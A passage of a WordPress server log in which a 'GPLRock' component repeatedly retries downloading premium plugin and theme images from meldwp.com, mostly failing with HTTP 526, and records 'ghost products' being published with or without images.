Code: 526, Error: . Retrying... [04-Apr-2026 07:34:11 UTC] GPLRock: Image download failed for product pmotion-animated-gif-and-video-maker-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pmotion---animated-gif-and-video-maker-for-wordpress-14506.webp for product pmotion-animated-gif-and-video-maker-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:13 UTC] GPLRock WARNING: Image download failed for product pmotion-animated-gif-and-video-maker-for-wordpress. URL: https://meldwp.com/wp-content/uploads/pmotion---animated-gif-and-video-maker-for-wordpress-14506.webp [04-Apr-2026 07:34:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pmotion-animated-gif-and-video-maker-for-wordpress [04-Apr-2026 07:34:13 UTC] GPLRock: Image download failed for product spectrum-audio-player-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:15 UTC] GPLRock: Image download failed for product spectrum-audio-player-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spectrum-audio-player-wordpress--woocommerce-plugin-22621.webp for product spectrum-audio-player-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:17 UTC] GPLRock: Image download failed for product spectrum-audio-player-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:20 UTC] GPLRock: Image download failed for product spectrum-audio-player-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spectrum-audio-player-wordpress--woocommerce-plugin-22621.webp for product spectrum-audio-player-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:22 UTC] GPLRock WARNING: Image download failed for product spectrum-audio-player-wordpress-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/spectrum-audio-player-wordpress--woocommerce-plugin-22621.webp [04-Apr-2026 07:34:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: spectrum-audio-player-wordpress-woocommerce-plugin [04-Apr-2026 07:34:22 UTC] GPLRock: Image download failed for product mine-flipbook-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:24 UTC] GPLRock: Image download failed for product mine-flipbook-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mine-flipbook-wordpress-plugin-32407.webp for product mine-flipbook-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:26 UTC] GPLRock: Image download failed for product mine-flipbook-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:28 UTC] GPLRock: Image download failed for product mine-flipbook-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mine-flipbook-wordpress-plugin-32407.webp for product mine-flipbook-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:30 UTC] GPLRock WARNING: Image download failed for product mine-flipbook-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/mine-flipbook-wordpress-plugin-32407.webp [04-Apr-2026 07:34:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mine-flipbook-wordpress-plugin [04-Apr-2026 07:34:30 UTC] GPLRock: Image download failed for product responsive-html5-audio-player-pro-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:33 UTC] GPLRock: Image download failed for product responsive-html5-audio-player-pro-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-html5-audio-player-pro-wordpress-plugin-8622.webp for product responsive-html5-audio-player-pro-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:35 UTC] GPLRock: Image download failed for product responsive-html5-audio-player-pro-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:37 UTC] GPLRock: Image download failed for product responsive-html5-audio-player-pro-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-html5-audio-player-pro-wordpress-plugin-8622.webp for product responsive-html5-audio-player-pro-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:39 UTC] GPLRock WARNING: Image download failed for product responsive-html5-audio-player-pro-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/responsive-html5-audio-player-pro-wordpress-plugin-8622.webp [04-Apr-2026 07:34:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: responsive-html5-audio-player-pro-wordpress-plugin [04-Apr-2026 07:34:39 UTC] GPLRock: Image download failed for product userpro-livechat (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:41 UTC] GPLRock: Image download failed for product userpro-livechat (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/userpro-livechat-11133.webp for product userpro-livechat after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:43 UTC] GPLRock: Image download failed for product userpro-livechat (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:45 UTC] GPLRock: Image download failed for product userpro-livechat (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/userpro-livechat-11133.webp for product userpro-livechat after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:48 UTC] GPLRock WARNING: Image download failed for product userpro-livechat. URL: https://meldwp.com/wp-content/uploads/userpro-livechat-11133.webp [04-Apr-2026 07:34:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: userpro-livechat [04-Apr-2026 07:34:48 UTC] GPLRock: Image download failed for product tuna-form-wizard-signup-login-reservation-and-questionnaire (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:50 UTC] GPLRock: Image download failed for product tuna-form-wizard-signup-login-reservation-and-questionnaire (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tuna-form-wizard-signup-login-reservation-and-questionnaire-2476.webp for product tuna-form-wizard-signup-login-reservation-and-questionnaire after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:52 UTC] GPLRock: Image download failed for product tuna-form-wizard-signup-login-reservation-and-questionnaire (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:54 UTC] GPLRock: Image download failed for product tuna-form-wizard-signup-login-reservation-and-questionnaire (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tuna-form-wizard-signup-login-reservation-and-questionnaire-2476.webp for product tuna-form-wizard-signup-login-reservation-and-questionnaire after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:56 UTC] GPLRock WARNING: Image download failed for product tuna-form-wizard-signup-login-reservation-and-questionnaire. URL: https://meldwp.com/wp-content/uploads/tuna-form-wizard-signup-login-reservation-and-questionnaire-2476.webp [04-Apr-2026 07:34:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tuna-form-wizard-signup-login-reservation-and-questionnaire [04-Apr-2026 07:34:56 UTC] GPLRock: Image downloaded successfully for product multilive-multiple-live-stream-broadcaster-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f90d2691.webp [04-Apr-2026 07:34:56 UTC] GPLRock: Using pre-downloaded image for product multilive-multiple-live-stream-broadcaster-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f90d2691.webp [04-Apr-2026 07:34:56 UTC] GPLRock: Ghost product published with image - Product ID: multilive-multiple-live-stream-broadcaster-plugin-for-wordpress [04-Apr-2026 07:34:57 UTC] GPLRock: Image download failed for product premium-media-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:59 UTC] GPLRock: Image download failed for product premium-media-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:35:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/premium-media-script-9687.webp for product premium-media-script after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:35:01 UTC] GPLRock: Image download failed for product premium-media-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:35:03 UTC] GPLRock: Image download failed for product premium-media-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:35:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/premium-media-script-9687.webp for product premium-media-script after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:35:05 UTC] GPLRock WARNING: Image download failed for product premium-media-script. URL: https://meldwp.com/wp-content/uploads/premium-media-script-9687.webp [04-Apr-2026 07:35:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: premium-media-script [04-Apr-2026 07:35:05 UTC] GPLRock: Image download failed for product dokan-postcode-restriction (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:35:07 UTC] GPLRock: Image download failed for product dokan-postcode-restriction (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:35:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dokan-postcode-restriction-30075.webp for product dokan-postcode-restriction after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:35:09 UTC] GPLRock: Image download failed for product dokan-postcode-restriction (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:35:12 UTC] GPLRock: Image download failed for product dokan-postcode-restriction (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:35:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dokan-postcode-restriction-30075.webp for product dokan-postcode-restriction after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:35:14 UTC] GPLRock WARNING: Image download failed for product dokan-postcode-restriction. URL: https://meldwp.com/wp-content/uploads/dokan-postcode-restriction-30075.webp [04-Apr-2026 07:35:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dokan-postcode-restriction [04-Apr-2026 07:37:17 UTC] GPLRock: Image download failed for product forest-revolution-wordpress-admin-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:20 UTC] GPLRock: Image download failed for product forest-revolution-wordpress-admin-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/forest---revolution-wordpress-admin-theme-27606.webp for product forest-revolution-wordpress-admin-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:37:22 UTC] GPLRock: Image download failed for product forest-revolution-wordpress-admin-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:24 UTC] GPLRock: Image download failed for product forest-revolution-wordpress-admin-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/forest---revolution-wordpress-admin-theme-27606.webp for product forest-revolution-wordpress-admin-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:37:26 UTC] GPLRock WARNING: Image download failed for product forest-revolution-wordpress-admin-theme. URL: https://meldwp.com/wp-content/uploads/forest---revolution-wordpress-admin-theme-27606.webp [04-Apr-2026 07:37:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: forest-revolution-wordpress-admin-theme [04-Apr-2026 07:37:26 UTC] GPLRock: Image download failed for product database-for-contact-form-7 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:28 UTC] GPLRock: Image download failed for product database-for-contact-form-7 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/database-for-contact-form-7-13774.webp for product database-for-contact-form-7 after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:37:30 UTC] GPLRock: Image download failed for product database-for-contact-form-7 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:33 UTC] GPLRock: Image download failed for product database-for-contact-form-7 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/database-for-contact-form-7-13774.webp for product database-for-contact-form-7 after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:37:35 UTC] GPLRock WARNING: Image download failed for product database-for-contact-form-7. URL: https://meldwp.com/wp-content/uploads/database-for-contact-form-7-13774.webp [04-Apr-2026 07:37:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: database-for-contact-form-7 [04-Apr-2026 07:37:35 UTC] GPLRock: Image download failed for product rose-business-suite-accounting-crm-and-pos-software (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:37 UTC] GPLRock: Image download failed for product rose-business-suite-accounting-crm-and-pos-software (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rose-business-suite---accounting-crm-and-pos-software-3370.webp for product rose-business-suite-accounting-crm-and-pos-software after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:37:39 UTC] GPLRock: Image download failed for product rose-business-suite-accounting-crm-and-pos-software (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:41 UTC] GPLRock: Image download failed for product rose-business-suite-accounting-crm-and-pos-software (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rose-business-suite---accounting-crm-and-pos-software-3370.webp for product rose-business-suite-accounting-crm-and-pos-software after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:37:43 UTC] GPLRock WARNING: Image download failed for product rose-business-suite-accounting-crm-and-pos-software. URL: https://meldwp.com/wp-content/uploads/rose-business-suite---accounting-crm-and-pos-software-3370.webp [04-Apr-2026 07:37:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rose-business-suite-accounting-crm-and-pos-software [04-Apr-2026 07:37:43 UTC] GPLRock: Image downloaded successfully for product listinghub-wordpress-business-directory-listing-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aa3f3d5e.webp [04-Apr-2026 07:37:43 UTC] GPLRock: Using pre-downloaded image for product listinghub-wordpress-business-directory-listing-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aa3f3d5e.webp [04-Apr-2026 07:37:43 UTC] GPLRock: Ghost product published with image - Product ID: listinghub-wordpress-business-directory-listing-plugin [04-Apr-2026 07:37:44 UTC] GPLRock: Image download failed for product wpcool-notifications-from-cf7-woocommerce-to-whatsapp-telegram-discord (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:46 UTC] GPLRock: Image download failed for product wpcool-notifications-from-cf7-woocommerce-to-whatsapp-telegram-discord (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpcool---notifications-from-cf7-woocommerce-to-whatsapp-telegram-discord-25670.webp for product wpcool-notifications-from-cf7-woocommerce-to-whatsapp-telegram-discord after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:37:48 UTC] GPLRock: Image download failed for product wpcool-notifications-from-cf7-woocommerce-to-whatsapp-telegram-discord (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:50 UTC] GPLRock: Image download failed for product wpcool-notifications-from-cf7-woocommerce-to-whatsapp-telegram-discord (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpcool---notifications-from-cf7-woocommerce-to-whatsapp-telegram-discord-25670.webp for product wpcool-notifications-from-cf7-woocommerce-to-whatsapp-telegram-discord after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:37:52 UTC] GPLRock WARNING: Image download failed for product wpcool-notifications-from-cf7-woocommerce-to-whatsapp-telegram-discord. URL: https://meldwp.com/wp-content/uploads/wpcool---notifications-from-cf7-woocommerce-to-whatsapp-telegram-discord-25670.webp [04-Apr-2026 07:37:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpcool-notifications-from-cf7-woocommerce-to-whatsapp-telegram-discord [04-Apr-2026 07:37:52 UTC] GPLRock: Image downloaded successfully for product woocommerce-first-order-discount (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8349997b.webp [04-Apr-2026 07:37:52 UTC] GPLRock: Using pre-downloaded image for product woocommerce-first-order-discount: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8349997b.webp [04-Apr-2026 07:37:52 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-first-order-discount [04-Apr-2026 07:37:53 UTC] GPLRock: Image download failed for product woocommerce-unlimited-product-information (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:55 UTC] GPLRock: Image download failed for product woocommerce-unlimited-product-information (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-unlimited-product-information-33283.webp for product woocommerce-unlimited-product-information after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:37:57 UTC] GPLRock: Image download failed for product woocommerce-unlimited-product-information (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:37:59 UTC] GPLRock: Image download failed for product woocommerce-unlimited-product-information (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:38:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-unlimited-product-information-33283.webp for product woocommerce-unlimited-product-information after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:38:01 UTC] GPLRock WARNING: Image download failed for product woocommerce-unlimited-product-information. URL: https://meldwp.com/wp-content/uploads/woocommerce-unlimited-product-information-33283.webp [04-Apr-2026 07:38:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-unlimited-product-information [04-Apr-2026 07:38:01 UTC] GPLRock: Image download failed for product wpbakery-page-builder-extensions-add-on-figure-navigation (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:38:03 UTC] GPLRock: Image download failed for product wpbakery-page-builder-extensions-add-on-figure-navigation (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:38:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-extensions-add-on---figure-navigation-25948.webp for product wpbakery-page-builder-extensions-add-on-figure-navigation after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:38:06 UTC] GPLRock: Image download failed for product wpbakery-page-builder-extensions-add-on-figure-navigation (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:38:08 UTC] GPLRock: Image download failed for product wpbakery-page-builder-extensions-add-on-figure-navigation (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:38:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-extensions-add-on---figure-navigation-25948.webp for product wpbakery-page-builder-extensions-add-on-figure-navigation after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:38:10 UTC] GPLRock WARNING: Image download failed for product wpbakery-page-builder-extensions-add-on-figure-navigation. URL: https://meldwp.com/wp-content/uploads/wpbakery-page-builder-extensions-add-on---figure-navigation-25948.webp [04-Apr-2026 07:38:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbakery-page-builder-extensions-add-on-figure-navigation [04-Apr-2026 07:38:10 UTC] GPLRock: Image download failed for product exchangepress-crypto-exchanges-list-pages-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:38:12 UTC] GPLRock: Image download failed for product exchangepress-crypto-exchanges-list-pages-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:38:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exchangepress--crypto-exchanges-list--pages-for-wordpress-20115.webp for product exchangepress-crypto-exchanges-list-pages-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:38:14 UTC] GPLRock: Image download failed for product exchangepress-crypto-exchanges-list-pages-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:38:16 UTC] GPLRock: Image download failed for product exchangepress-crypto-exchanges-list-pages-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:38:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exchangepress--crypto-exchanges-list--pages-for-wordpress-20115.webp for product exchangepress-crypto-exchanges-list-pages-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:38:19 UTC] GPLRock WARNING: Image download failed for product exchangepress-crypto-exchanges-list-pages-for-wordpress. URL: https://meldwp.com/wp-content/uploads/exchangepress--crypto-exchanges-list--pages-for-wordpress-20115.webp [04-Apr-2026 07:38:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: exchangepress-crypto-exchanges-list-pages-for-wordpress [04-Apr-2026 07:38:19 UTC] GPLRock: Image download failed for product block-quote-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:38:21 UTC] GPLRock: Image download failed for product block-quote-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:38:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/block-quote-addon-for-elementor-24115.webp for product block-quote-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:38:23 UTC] GPLRock: Image download failed for product block-quote-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:38:25 UTC] GPLRock: Image download failed for product block-quote-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:38:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/block-quote-addon-for-elementor-24115.webp for product block-quote-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:38:27 UTC] GPLRock WARNING: Image download failed for product block-quote-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/block-quote-addon-for-elementor-24115.webp [04-Apr-2026 07:38:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: block-quote-addon-for-elementor [04-Apr-2026 07:38:38 UTC] GPLRock: Image downloaded successfully for product adventure-tours-wordpress-tour-travel-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f2bc8784.jpg [04-Apr-2026 07:38:38 UTC] GPLRock: Using pre-downloaded image for product adventure-tours-wordpress-tour-travel-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f2bc8784.jpg [04-Apr-2026 07:38:38 UTC] GPLRock: Ghost product published with image - Product ID: adventure-tours-wordpress-tour-travel-theme [04-Apr-2026 07:38:40 UTC] GPLRock: Image downloaded successfully for product woocommerce-multistep-checkout-wizard (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a976fba8.jpg [04-Apr-2026 07:38:40 UTC] GPLRock: Using pre-downloaded image for product woocommerce-multistep-checkout-wizard: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a976fba8.jpg [04-Apr-2026 07:38:40 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-multistep-checkout-wizard [04-Apr-2026 07:38:42 UTC] GPLRock: Image downloaded successfully for product ultimate-social-easy-social-share-buttons-and-fan-counters-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1d7a2f94.jpg [04-Apr-2026 07:38:42 UTC] GPLRock: Using pre-downloaded image for product ultimate-social-easy-social-share-buttons-and-fan-counters-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1d7a2f94.jpg [04-Apr-2026 07:38:42 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-social-easy-social-share-buttons-and-fan-counters-for-wordpress [04-Apr-2026 07:38:43 UTC] GPLRock: Image downloaded successfully for product woocommerce-fedex-shipping-method (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-da488045.jpg [04-Apr-2026 07:38:43 UTC] GPLRock: Using pre-downloaded image for product woocommerce-fedex-shipping-method: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-da488045.jpg [04-Apr-2026 07:38:43 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-fedex-shipping-method [04-Apr-2026 07:38:45 UTC] GPLRock: Image downloaded successfully for product recaptcha-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6e01e16f.jpg [04-Apr-2026 07:38:45 UTC] GPLRock: Using pre-downloaded image for product recaptcha-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6e01e16f.jpg [04-Apr-2026 07:38:45 UTC] GPLRock: Ghost product published with image - Product ID: recaptcha-for-woocommerce [04-Apr-2026 07:38:47 UTC] GPLRock: Image downloaded successfully for product borlabs-cookie-cookie-opt-in (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d08689cb.jpg [04-Apr-2026 07:38:47 UTC] GPLRock: Using pre-downloaded image for product borlabs-cookie-cookie-opt-in: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d08689cb.jpg [04-Apr-2026 07:38:47 UTC] GPLRock: Ghost product published with image - Product ID: borlabs-cookie-cookie-opt-in [04-Apr-2026 07:38:48 UTC] GPLRock: Image downloaded successfully for product design-upgrade-pro-for-learndash (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-95ddb7f5.jpg [04-Apr-2026 07:38:48 UTC] GPLRock: Using pre-downloaded image for product design-upgrade-pro-for-learndash: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-95ddb7f5.jpg [04-Apr-2026 07:38:48 UTC] GPLRock: Ghost product published with image - Product ID: design-upgrade-pro-for-learndash [04-Apr-2026 07:38:50 UTC] GPLRock: Image downloaded successfully for product quick-buy-now-button-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5af25956.jpg [04-Apr-2026 07:38:50 UTC] GPLRock: Using pre-downloaded image for product quick-buy-now-button-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5af25956.jpg [04-Apr-2026 07:38:50 UTC] GPLRock: Ghost product published with image - Product ID: quick-buy-now-button-for-woocommerce [04-Apr-2026 07:38:52 UTC] GPLRock: Image downloaded successfully for product the-events-calendar-filter-bar (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8924e01b.jpg [04-Apr-2026 07:38:52 UTC] GPLRock: Using pre-downloaded image for product the-events-calendar-filter-bar: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8924e01b.jpg [04-Apr-2026 07:38:52 UTC] GPLRock: Ghost product published with image - Product ID: the-events-calendar-filter-bar [04-Apr-2026 07:38:54 UTC] GPLRock: Image downloaded successfully for product leadengine-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f5e14d10.jpg [04-Apr-2026 07:38:54 UTC] GPLRock: Using pre-downloaded image for product leadengine-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f5e14d10.jpg [04-Apr-2026 07:38:54 UTC] GPLRock: Ghost product published with image - Product ID: 